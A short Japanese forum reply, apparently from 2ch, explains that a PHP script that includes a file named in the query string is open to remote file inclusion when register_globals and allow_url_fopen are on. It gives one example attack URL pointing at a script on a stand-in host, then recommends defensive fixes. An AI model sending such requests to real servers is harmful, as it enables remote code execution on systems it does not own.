>>724
外してるかもしれないけど、
>・switchにdefaultをいれなかった
register_globalsがonで
allow_url_opnもonだと
やられちゃうね
http://www.2ch.net/2ch.php?saba=3&file=http://www.example.com/crack-php-script.txt
とかで任意のスクリプトが>>724のサーバー上で実行できる

switch文のdefaultは当然書くとして、
register_globalsはoffに、
includeしてるファイルは動的なコンテンツ?
静的な(ただのhtmlファイル)にして
echo file_get_contents("$file.html");
に出来ないのかな?